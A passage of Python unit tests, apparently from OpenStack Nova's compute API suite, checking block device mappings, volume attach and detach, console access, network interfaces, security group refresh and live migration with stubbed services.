self.context, instance_type, instance['uuid'], image_mapping)
bdms = [block_device.BlockDeviceDict(bdm) for bdm in
db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])]
expected_result = [
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': 'swap', 'device_name': '/dev/sdb1',
'volume_size': swap_size, 'delete_on_termination': True},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': CONF.default_ephemeral_format,
'device_name': '/dev/sdc3', 'delete_on_termination': True},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': CONF.default_ephemeral_format,
'device_name': '/dev/sdc1', 'delete_on_termination': True},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': CONF.default_ephemeral_format,
'device_name': '/dev/sdc2', 'delete_on_termination': True},
]
bdms.sort(key=operator.itemgetter('device_name'))
expected_result.sort(key=operator.itemgetter('device_name'))
self.assertEqual(len(bdms), len(expected_result))
for expected, got in zip(expected_result, bdms):
self.assertThat(expected, matchers.IsSubDictOf(got))
self.compute_api._update_block_device_mapping(
self.context, flavors.get_default_flavor(),
instance['uuid'], block_device_mapping)
bdms = [block_device.BlockDeviceDict(bdm) for bdm in
db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])]
expected_result = [
{'snapshot_id': '00000000-aaaa-bbbb-cccc-000000000000',
'device_name': '/dev/sda1'},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': 'swap', 'device_name': '/dev/sdb1',
'volume_size': swap_size, 'delete_on_termination': True},
{'device_name': '/dev/sdb2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '11111111-aaaa-bbbb-cccc-111111111111',
'delete_on_termination': False},
{'device_name': '/dev/sdb3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '22222222-aaaa-bbbb-cccc-222222222222'},
{'device_name': '/dev/sdb4', 'no_device': True},
{'device_name': '/dev/sdc1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-333333333333',
'delete_on_termination': False},
{'device_name': '/dev/sdc2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-444444444444',
'delete_on_termination': False},
{'device_name': '/dev/sdc3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '44444444-aaaa-bbbb-cccc-555555555555'},
{'no_device': True, 'device_name': '/dev/sdc4'},
{'device_name': '/dev/sdd1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '55555555-aaaa-bbbb-cccc-666666666666',
'delete_on_termination': False},
{'device_name': '/dev/sdd2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '66666666-aaaa-bbbb-cccc-777777777777'},
{'device_name': '/dev/sdd3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '77777777-aaaa-bbbb-cccc-888888888888'},
{'no_device': True, 'device_name': '/dev/sdd4'}]
bdms.sort(key=operator.itemgetter('device_name'))
expected_result.sort(key=operator.itemgetter('device_name'))
self.assertEqual(len(bdms), len(expected_result))
for expected, got in zip(expected_result, bdms):
self.assertThat(expected, matchers.IsSubDictOf(got))
for bdm in db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid']):
db.block_device_mapping_destroy(self.context, bdm['id'])
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.compute.terminate_instance(self.context,
jsonutils.to_primitive(instance))
def test_check_and_transform_bdm(self):
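        # Legacy BDMs are converted to the new format; an image BDM is only
        # added when no existing BDM covers the root device.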
base_options = {'root_device_name': 'vdb',
'image_ref': FAKE_IMAGE_REF}
fake_legacy_bdms = [
{'device_name': '/dev/vda',
'volume_id': '33333333-aaaa-bbbb-cccc-333333333333',
'delete_on_termination': False}]
# We get an image BDM
transformed_bdm = self.compute_api._check_and_transform_bdm(
base_options, 1, 1, fake_legacy_bdms, True)
self.assertEqual(len(transformed_bdm), 2)
# No image BDM created
base_options['root_device_name'] = 'vda'
transformed_bdm = self.compute_api._check_and_transform_bdm(
base_options, 1, 1, fake_legacy_bdms, True)
self.assertEqual(len(transformed_bdm), 1)
# Volumes with multiple instances fails
self.assertRaises(exception.InvalidRequest,
self.compute_api._check_and_transform_bdm,
base_options, 1, 2, fake_legacy_bdms, True)
checked_bdm = self.compute_api._check_and_transform_bdm(
base_options, 1, 1, transformed_bdm, True)
self.assertEqual(checked_bdm, transformed_bdm)
def test_volume_size(self):
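        # _volume_size should fall back to the flavor's swap/ephemeral sizes
        # when the BDM does not specify an explicit volume_size.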
ephemeral_size = 2
swap_size = 3
volume_size = 5
swap_bdm = {'source_type': 'blank', 'guest_format': 'swap'}
ephemeral_bdm = {'source_type': 'blank', 'guest_format': None}
volume_bdm = {'source_type': 'volume', 'volume_size': volume_size}
inst_type = {'ephemeral_gb': ephemeral_size, 'swap': swap_size}
self.assertEqual(
self.compute_api._volume_size(inst_type, ephemeral_bdm),
ephemeral_size)
ephemeral_bdm['volume_size'] = 42
self.assertEqual(
self.compute_api._volume_size(inst_type, ephemeral_bdm), 42)
self.assertEqual(
self.compute_api._volume_size(inst_type, swap_bdm),
swap_size)
swap_bdm['volume_size'] = 42
self.assertEqual(
self.compute_api._volume_size(inst_type, swap_bdm), 42)
self.assertEqual(
self.compute_api._volume_size(inst_type, volume_bdm),
volume_size)
def test_is_volume_backed_instance(self):
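        # An instance is volume backed when it has no image_ref or when a
        # volume/snapshot BDM provides boot index 0.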
ctxt = self.context
instance = self._create_fake_instance({'image_ref': ''})
self.assertTrue(
self.compute_api.is_volume_backed_instance(ctxt, instance, None))
instance = self._create_fake_instance({'root_device_name': 'vda'})
self.assertFalse(
self.compute_api.is_volume_backed_instance(ctxt, instance, []))
bdms = [{'device_name': '/dev/vda',
'volume_id': 'fake_volume_id',
'boot_index': 0,
'destination_type': 'volume'}]
self.assertTrue(
self.compute_api.is_volume_backed_instance(ctxt, instance, bdms))
bdms = [{'device_name': '/dev/vda',
'volume_id': 'fake_volume_id',
'destination_type': 'local',
'boot_index': 0,
'snapshot_id': None},
{'device_name': '/dev/vdb',
'boot_index': 1,
'destination_type': 'volume',
'volume_id': 'c2ec2156-d75e-11e2-985b-5254009297d6',
'snapshot_id': None}]
self.assertFalse(
self.compute_api.is_volume_backed_instance(ctxt, instance, bdms))
bdms = [{'device_name': '/dev/vda',
'snapshot_id': 'de8836ac-d75e-11e2-8271-5254009297d6',
'destination_type': 'volume',
'boot_index': 0,
'volume_id': None}]
self.assertTrue(
self.compute_api.is_volume_backed_instance(ctxt, instance, bdms))
def test_is_volume_backed_instance_no_bdms(self):
ctxt = self.context
instance = self._create_fake_instance()
self.mox.StubOutWithMock(self.compute_api, 'get_instance_bdms')
self.compute_api.get_instance_bdms(ctxt, instance,
legacy=False).AndReturn([])
self.mox.ReplayAll()
self.compute_api.is_volume_backed_instance(ctxt, instance, None)
def test_reservation_id_one_instance(self):
"""Verify building an instance has a reservation_id that
matches return value from create.
"""
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image')
try:
self.assertEqual(len(refs), 1)
self.assertEqual(refs[0]['reservation_id'], resv_id)
finally:
db.instance_destroy(self.context, refs[0]['uuid'])
def test_reservation_ids_two_instances(self):
"""Verify building 2 instances at once results in a
reservation_id being returned equal to reservation id set
in both instances.
"""
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2)
try:
self.assertEqual(len(refs), 2)
self.assertNotEqual(resv_id, None)
finally:
for instance in refs:
self.assertEqual(instance['reservation_id'], resv_id)
db.instance_destroy(self.context, refs[0]['uuid'])
def test_multi_instance_display_name_template(self):
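        # The multi_instance_display_name_template flag controls how
        # display_name and hostname are expanded for multi-instance requests.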
self.flags(multi_instance_display_name_template='%(name)s')
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2, display_name='x')
self.assertEqual(refs[0]['display_name'], 'x')
self.assertEqual(refs[0]['hostname'], 'x')
self.assertEqual(refs[1]['display_name'], 'x')
self.assertEqual(refs[1]['hostname'], 'x')
self.flags(multi_instance_display_name_template='%(name)s-%(count)s')
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2, display_name='x')
self.assertEqual(refs[0]['display_name'], 'x-1')
self.assertEqual(refs[0]['hostname'], 'x-1')
self.assertEqual(refs[1]['display_name'], 'x-2')
self.assertEqual(refs[1]['hostname'], 'x-2')
self.flags(multi_instance_display_name_template='%(name)s-%(uuid)s')
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2, display_name='x')
self.assertEqual(refs[0]['display_name'], 'x-%s' % refs[0]['uuid'])
self.assertEqual(refs[0]['hostname'], 'x-%s' % refs[0]['uuid'])
self.assertEqual(refs[1]['display_name'], 'x-%s' % refs[1]['uuid'])
self.assertEqual(refs[1]['hostname'], 'x-%s' % refs[1]['uuid'])
def test_instance_architecture(self):
# Test the instance architecture.
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['architecture'], 'x86_64')
db.instance_destroy(self.context, i_ref['uuid'])
def test_instance_unknown_architecture(self):
        # Ensure an instance created with an empty architecture is not
        # reported as 'Unknown'.
instance = jsonutils.to_primitive(self._create_fake_instance(
params={'architecture': ''}))
try:
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context,
instance['uuid'])
self.assertNotEqual(instance['architecture'], 'Unknown')
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_instance_name_template(self):
# Test the instance_name template.
self.flags(instance_name_template='instance-%d')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], 'instance-%d' % i_ref['id'])
db.instance_destroy(self.context, i_ref['uuid'])
self.flags(instance_name_template='instance-%(uuid)s')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], 'instance-%s' % i_ref['uuid'])
db.instance_destroy(self.context, i_ref['uuid'])
self.flags(instance_name_template='%(id)d-%(uuid)s')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], '%d-%s' %
(i_ref['id'], i_ref['uuid']))
db.instance_destroy(self.context, i_ref['uuid'])
        # %(name)s is not allowed; the name defaults to the uuid
self.flags(instance_name_template='%(name)s')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], i_ref['uuid'])
db.instance_destroy(self.context, i_ref['uuid'])
def test_add_remove_fixed_ip(self):
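        # Adding and then removing a fixed IP should succeed without error.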
instance = self._create_fake_instance(params={'host': CONF.host})
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.add_fixed_ip(self.context, instance, '1')
self.compute_api.remove_fixed_ip(self.context, instance, '192.168.1.1')
self.compute_api.delete(self.context, self._objectify(instance))
def test_attach_volume_invalid(self):
self.assertRaises(exception.InvalidDevicePath,
self.compute_api.attach_volume,
self.context,
{'locked': False, 'vm_state': vm_states.ACTIVE,
'launched_at': timeutils.utcnow()},
None,
'/invalid')
def test_no_attach_volume_in_rescue_state(self):
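        # A volume must not be attachable while the instance is rescued.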
def fake(*args, **kwargs):
pass
def fake_volume_get(self, context, volume_id):
return {'id': volume_id}
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake)
self.stubs.Set(cinder.API, 'reserve_volume', fake)
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.attach_volume,
self.context,
{'uuid': 'fake_uuid', 'locked': False,
'vm_state': vm_states.RESCUED},
None,
'/dev/vdb')
def test_no_detach_volume_in_rescue_state(self):
        # Ensure a volume cannot be detached while the instance is rescued.
params = {'vm_state': vm_states.RESCUED}
instance = self._create_fake_instance(params=params)
volume = {'id': 1, 'attach_status': 'in-use',
'instance_uuid': instance['uuid']}
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.detach_volume,
self.context, instance, volume)
def test_no_rescue_in_volume_state_attaching(self):
# Make sure a VM cannot be rescued while volume is being attached
instance = self._create_fake_instance()
def fake_get_instance_bdms(*args, **kwargs):
return [{'device_name': '/dev/vda',
'source_type': 'volume',
'destination_type': 'volume',
'volume_id': 'bf0b6b00-a20c-11e2-9e96-0800200c9a66'}]
self.stubs.Set(self.compute_api, 'get_instance_bdms',
fake_get_instance_bdms)
def fake_volume_get(self, context, volume_id):
return {'id': volume_id, 'status': 'attaching'}
self.stubs.Set(cinder.API, 'get', fake_volume_get)
volume = {'id': 'bf0b6b00-a20c-11e2-9e96-0800200c9a66',
'state': 'active', 'instance_uuid': instance['uuid']}
self.assertRaises(exception.InvalidVolume,
self.compute_api.rescue, self.context, instance)
def test_vnc_console(self):
        # Make sure we can get a VNC console for an instance.
fake_instance = {'uuid': 'fake_uuid',
'host': 'fake_compute_host'}
fake_console_type = "novnc"
fake_connect_info = {'token': 'fake_token',
'console_type': fake_console_type,
'host': 'fake_console_host',
'port': 'fake_console_port',
'internal_access_path': 'fake_access_path',
'instance_uuid': fake_instance['uuid']}
fake_connect_info2 = copy.deepcopy(fake_connect_info)
fake_connect_info2['access_url'] = 'fake_console_url'
self.mox.StubOutWithMock(rpc, 'call')
rpc_msg1 = {'method': 'get_vnc_console',
'namespace': None,
'args': {'instance': fake_instance,
'console_type': fake_console_type},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION}
rpc_msg2 = {'method': 'authorize_console',
'namespace': None,
'args': fake_connect_info,
'version': '1.2'}
rpc.call(self.context, 'compute.%s' % fake_instance['host'],
rpc_msg1, None).AndReturn(fake_connect_info2)
rpc.call(self.context, CONF.consoleauth_topic,
rpc_msg2, None).AndReturn(None)
self.mox.ReplayAll()
console = self.compute_api.get_vnc_console(self.context,
fake_instance, fake_console_type)
self.assertEqual(console, {'url': 'fake_console_url'})
def test_get_vnc_console_no_host(self):
instance = self._create_fake_instance(params={'host': ''})
self.assertRaises(exception.InstanceNotReady,
self.compute_api.get_vnc_console,
self.context, instance, 'novnc')
db.instance_destroy(self.context, instance['uuid'])
def test_spice_console(self):
        # Make sure we can get a SPICE console for an instance.
fake_instance = {'uuid': 'fake_uuid',
'host': 'fake_compute_host'}
fake_console_type = "spice-html5"
fake_connect_info = {'token': 'fake_token',
'console_type': fake_console_type,
'host': 'fake_console_host',
'port': 'fake_console_port',
'internal_access_path': 'fake_access_path',
'instance_uuid': fake_instance['uuid']}
fake_connect_info2 = copy.deepcopy(fake_connect_info)
fake_connect_info2['access_url'] = 'fake_console_url'
self.mox.StubOutWithMock(rpc, 'call')
rpc_msg1 = {'method': 'get_spice_console',
'namespace': None,
'args': {'instance': fake_instance,
'console_type': fake_console_type},
'version': '2.24'}
rpc_msg2 = {'method': 'authorize_console',
'namespace': None,
'args': fake_connect_info,
'version': '1.2'}
rpc.call(self.context, 'compute.%s' % fake_instance['host'],
rpc_msg1, None).AndReturn(fake_connect_info2)
rpc.call(self.context, CONF.consoleauth_topic,
rpc_msg2, None).AndReturn(None)
self.mox.ReplayAll()
console = self.compute_api.get_spice_console(self.context,
fake_instance, fake_console_type)
self.assertEqual(console, {'url': 'fake_console_url'})
def test_get_spice_console_no_host(self):
instance = self._create_fake_instance(params={'host': ''})
self.assertRaises(exception.InstanceNotReady,
self.compute_api.get_spice_console,
self.context, instance, 'spice')
db.instance_destroy(self.context, instance['uuid'])
def test_console_output(self):
fake_instance = {'uuid': 'fake_uuid',
'host': 'fake_compute_host'}
fake_tail_length = 699
fake_console_output = 'fake console output'
self.mox.StubOutWithMock(rpc, 'call')
rpc_msg = {'method': 'get_console_output',
'namespace': None,
'args': {'instance': fake_instance,
'tail_length': fake_tail_length},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION}
rpc.call(self.context, 'compute.%s' % fake_instance['host'],
rpc_msg, None).AndReturn(fake_console_output)
self.mox.ReplayAll()
output = self.compute_api.get_console_output(self.context,
fake_instance, tail_length=fake_tail_length)
self.assertEqual(output, fake_console_output)
def test_console_output_no_host(self):
instance = self._create_fake_instance(params={'host': ''})
self.assertRaises(exception.InstanceNotReady,
self.compute_api.get_console_output,
self.context, instance)
db.instance_destroy(self.context, instance['uuid'])
def test_attach_interface(self):
new_type = flavors.get_flavor_by_flavor_id('4')
sys_meta = flavors.save_flavor_info({}, new_type)
instance = {
'image_ref': 'foo',
'system_metadata': sys_meta,
}
self.mox.StubOutWithMock(self.compute.network_api,
'allocate_port_for_instance')
nwinfo = [fake_network_cache_model.new_vif()]
network_id = nwinfo[0]['network']['id']
port_id = nwinfo[0]['id']
req_ip = '1.2.3.4'
self.compute.network_api.allocate_port_for_instance(
self.context, instance, port_id, network_id, req_ip
).AndReturn(nwinfo)
self.mox.ReplayAll()
vif = self.compute.attach_interface(self.context,
instance,
network_id,
port_id,
req_ip)
self.assertEqual(vif['id'], network_id)
return nwinfo, port_id
def test_detach_interface(self):
nwinfo, port_id = self.test_attach_interface()
self.stubs.Set(self.compute, '_get_instance_nw_info',
lambda *a, **k: nwinfo)
self.stubs.Set(self.compute.network_api,
'deallocate_port_for_instance',
lambda a, b, c: [])
self.compute.detach_interface(self.context, {}, port_id)
self.assertEqual(self.compute.driver._interfaces, {})
def test_attach_volume(self):
# Ensure a volume can be attached to an instance.
called = {}
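# Track which stubbed cinder / compute RPC entry points actually get hit
# so they can be asserted on after the attach call.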
def fake_check_attach(*args, **kwargs):
called['fake_check_attach'] = True
def fake_reserve_volume(*args, **kwargs):
called['fake_reserve_volume'] = True
def fake_volume_get(self, context, volume_id):
called['fake_volume_get'] = True
return {'id': volume_id}
def fake_rpc_attach_volume(self, context, **kwargs):
called['fake_rpc_attach_volume'] = True
def fake_rpc_reserve_block_device_name(self, context, **kwargs):
called['fake_rpc_reserve_block_device_name'] = True
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake_check_attach)
self.stubs.Set(cinder.API, 'reserve_volume',
fake_reserve_volume)
self.stubs.Set(compute_rpcapi.ComputeAPI,
'reserve_block_device_name',
fake_rpc_reserve_block_device_name)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'attach_volume',
fake_rpc_attach_volume)
instance = self._create_fake_instance()
self.compute_api.attach_volume(self.context, instance, 1, '/dev/vdb')
self.assertTrue(called.get('fake_check_attach'))
self.assertTrue(called.get('fake_reserve_volume'))
self.assertTrue(called.get('fake_volume_get'))
self.assertTrue(called.get('fake_rpc_reserve_block_device_name'))
self.assertTrue(called.get('fake_rpc_attach_volume'))
def test_attach_volume_no_device(self):
called = {}
def fake_check_attach(*args, **kwargs):
called['fake_check_attach'] = True
def fake_reserve_volume(*args, **kwargs):
called['fake_reserve_volume'] = True
def fake_volume_get(self, context, volume_id):
called['fake_volume_get'] = True
return {'id': volume_id}
def fake_rpc_attach_volume(self, context, **kwargs):
called['fake_rpc_attach_volume'] = True
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake_check_attach)
self.stubs.Set(cinder.API, 'reserve_volume',
fake_reserve_volume)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'attach_volume',
fake_rpc_attach_volume)
def test_detach_volume(self):
# Ensure volume can be detached from instance
called = {}
instance = self._create_fake_instance()
volume = {'id': 1, 'attach_status': 'in-use',
'instance_uuid': instance['uuid']}
def fake_check_detach(*args, **kwargs):
called['fake_check_detach'] = True
def fake_begin_detaching(*args, **kwargs):
called['fake_begin_detaching'] = True
def fake_rpc_detach_volume(self, context, **kwargs):
called['fake_rpc_detach_volume'] = True
self.stubs.Set(cinder.API, 'check_detach', fake_check_detach)
self.stubs.Set(cinder.API, 'begin_detaching', fake_begin_detaching)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'detach_volume',
fake_rpc_detach_volume)
self.compute_api.detach_volume(self.context,
instance, volume)
self.assertTrue(called.get('fake_check_detach'))
self.assertTrue(called.get('fake_begin_detaching'))
self.assertTrue(called.get('fake_rpc_detach_volume'))
def test_detach_invalid_volume(self):
# Ensure an exception is raised when detaching an unattached volume
instance = {'uuid': 'uuid1',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE}
volume = {'id': 1, 'attach_status': 'detached'}
self.assertRaises(exception.InvalidVolume,
self.compute_api.detach_volume, self.context,
instance, volume)
def test_detach_unattached_volume(self):
# Ensure an exception is raised when the volume's record of the
# attached instance doesn't match the instance being detached.
instance = {'uuid': 'uuid1',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE}
volume = {'id': 1, 'attach_status': 'in-use',
'instance_uuid': 'uuid2'}
self.assertRaises(exception.VolumeUnattached,
self.compute_api.detach_volume, self.context,
instance, volume)
def test_detach_volume_libvirt_is_down(self):
# Ensure rollback during detach if libvirt goes down
called = {}
instance = self._create_fake_instance()
def fake_get_instance_volume_bdm(*args, **kwargs):
return {'device_name': '/dev/vdb', 'volume_id': 1,
'connection_info': '{"test": "test"}'}
def fake_libvirt_driver_instance_exists(*args, **kwargs):
called['fake_libvirt_driver_instance_exists'] = True
return False
def fake_libvirt_driver_detach_volume_fails(*args, **kwargs):
called['fake_libvirt_driver_detach_volume_fails'] = True
raise AttributeError()
def fake_roll_detaching(*args, **kwargs):
called['fake_roll_detaching'] = True
self.stubs.Set(cinder.API, 'roll_detaching', fake_roll_detaching)
self.stubs.Set(self.compute, "_get_instance_volume_bdm",
fake_get_instance_volume_bdm)
self.stubs.Set(self.compute.driver, "instance_exists",
fake_libvirt_driver_instance_exists)
self.stubs.Set(self.compute.driver, "detach_volume",
fake_libvirt_driver_detach_volume_fails)
self.assertRaises(AttributeError, self.compute.detach_volume,
self.context, 1, instance)
self.assertTrue(called.get('fake_libvirt_driver_instance_exists'))
self.assertTrue(called.get('fake_roll_detaching'))
def test_terminate_with_volumes(self):
# Make sure that volumes get detached during instance termination.
admin = context.get_admin_context()
instance = self._create_fake_instance()
volume_id = 'fake'
values = {'instance_uuid': instance['uuid'],
'device_name': '/dev/vdc',
'delete_on_termination': False,
'volume_id': volume_id,
}
db.block_device_mapping_create(admin, values)
def fake_volume_get(self, context, volume_id):
return {'id': volume_id}
self.stubs.Set(cinder.API, "get", fake_volume_get)
# Stub out and record whether it gets detached
result = {"detached": False}
def fake_detach(self, context, volume_id_param):
result["detached"] = volume_id_param == volume_id
self.stubs.Set(cinder.API, "detach", fake_detach)
def fake_terminate_connection(self, context, volume_id, connector):
return {}
self.stubs.Set(cinder.API, "terminate_connection",
fake_terminate_connection)
# Kill the instance and check that it was detached
self.compute.terminate_instance(admin, instance=instance)
self.assertTrue(result["detached"])
def test_terminate_deletes_all_bdms(self):
admin = context.get_admin_context()
instance = self._create_fake_instance()
img_bdm = {'instance_uuid': instance['uuid'],
'device_name': '/dev/vda',
'source_type': 'image',
'destination_type': 'local',
'delete_on_termination': False,
'boot_index': 0,
'image_id': 'fake_image'}
vol_bdm = {'instance_uuid': instance['uuid'],
'device_name': '/dev/vdc',
'source_type': 'volume',
'destination_type': 'volume',
'delete_on_termination': False,
'volume_id': 'fake_vol'}
for bdm in img_bdm, vol_bdm:
db.block_device_mapping_create(admin, bdm, legacy=False)
self.stubs.Set(self.compute, 'volume_api', mox.MockAnything())
self.stubs.Set(self.compute, '_prep_block_device', mox.MockAnything())
self.compute.run_instance(self.context, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
bdms = db.block_device_mapping_get_all_by_instance(admin,
instance['uuid'])
self.assertEquals(len(bdms), 0)
def test_inject_network_info(self):
instance = self._create_fake_instance(params={'host': CONF.host})
self.compute.run_instance(self.context,
instance=jsonutils.to_primitive(instance))
instance = self.compute_api.get(self.context, instance['uuid'],
want_objects=True)
self.compute_api.inject_network_info(self.context, instance)
self.stubs.Set(self.compute_api.network_api,
'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.delete(self.context, instance)
def test_reset_network(self):
instance = self._create_fake_instance()
self.compute.run_instance(self.context,
instance=jsonutils.to_primitive(instance))
instance = self.compute_api.get(self.context, instance['uuid'],
want_objects=True)
self.compute_api.reset_network(self.context, instance)
def test_lock(self):
instance = self._create_fake_instance_obj()
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.lock(self.context, instance)
def test_unlock(self):
instance = self._create_fake_instance_obj()
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.unlock(self.context, instance)
def test_get_lock(self):
instance = self._create_fake_instance()
self.assertFalse(self.compute_api.get_lock(self.context, instance))
db.instance_update(self.context, instance['uuid'], {'locked': True})
self.assertTrue(self.compute_api.get_lock(self.context, instance))
def test_add_remove_security_group(self):
instance = self._create_fake_instance()
self.compute.run_instance(self.context,
instance=jsonutils.to_primitive(instance))
instance = self.compute_api.get(self.context, instance['uuid'])
security_group_name = self._create_group()['name']
self.security_group_api.add_to_instance(self.context,
instance,
security_group_name)
self.security_group_api.remove_from_instance(self.context,
instance,
security_group_name)
def test_get_diagnostics(self):
instance = self._create_fake_instance()
rpcapi = compute_rpcapi.ComputeAPI
self.mox.StubOutWithMock(rpcapi, 'get_diagnostics')
rpcapi.get_diagnostics(self.context, instance=instance)
self.mox.ReplayAll()
self.compute_api.get_diagnostics(self.context, instance)
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.delete(self.context, self._objectify(instance))
def test_inject_file(self):
# Ensure we can write a file to an instance.
instance = self._create_fake_instance()
self.compute_api.inject_file(self.context, instance,
"/tmp/test", "File Contents")
db.instance_destroy(self.context, instance['uuid'])
def test_secgroup_refresh(self):
instance = self._create_fake_instance()
def rule_get(*args, **kwargs):
mock_rule = db_fakes.FakeModel({'parent_group_id': 1})
return [mock_rule]
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(
self.compute_api.db,
'security_group_rule_get_by_security_group_grantee',
rule_get)
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_members_refresh(self.context, [1])
def test_secgroup_refresh_once(self):
instance = self._create_fake_instance()
def rule_get(*args, **kwargs):
mock_rule = db_fakes.FakeModel({'parent_group_id': 1})
return [mock_rule]
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(
self.compute_api.db,
'security_group_rule_get_by_security_group_grantee',
rule_get)
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_members_refresh(self.context, [1, 2])
def test_secgroup_refresh_none(self):
def rule_get(*args, **kwargs):
mock_rule = db_fakes.FakeModel({'parent_group_id': 1})
return [mock_rule]
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': []})
return mock_group
self.stubs.Set(
self.compute_api.db,
'security_group_rule_get_by_security_group_grantee',
rule_get)
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
self.mox.ReplayAll()
self.security_group_api.trigger_members_refresh(self.context, [1])
def test_secrule_refresh(self):
instance = self._create_fake_instance()
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_rules_refresh(self.context, [1])
def test_secrule_refresh_once(self):
instance = self._create_fake_instance()
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_rules_refresh(self.context, [1, 2])
def test_secrule_refresh_none(self):
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': []})
return mock_group
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
self.mox.ReplayAll()
self.security_group_api.trigger_rules_refresh(self.context, [1, 2])
def test_live_migrate(self):
instance, instance_uuid = self._run_instance()
instance = self._objectify(instance)
rpcapi = self.compute_api.compute_task_api
self.mox.StubOutWithMock(rpcapi, 'live_migrate_instance')
rpcapi.live_migrate_instance(self.context, instance, 'fake_dest_host',
block_migration=True,
disk_over_commit=True)
self.mox.ReplayAll()
self.compute_api.live_migrate(self.context, instance,
block_migration=True,
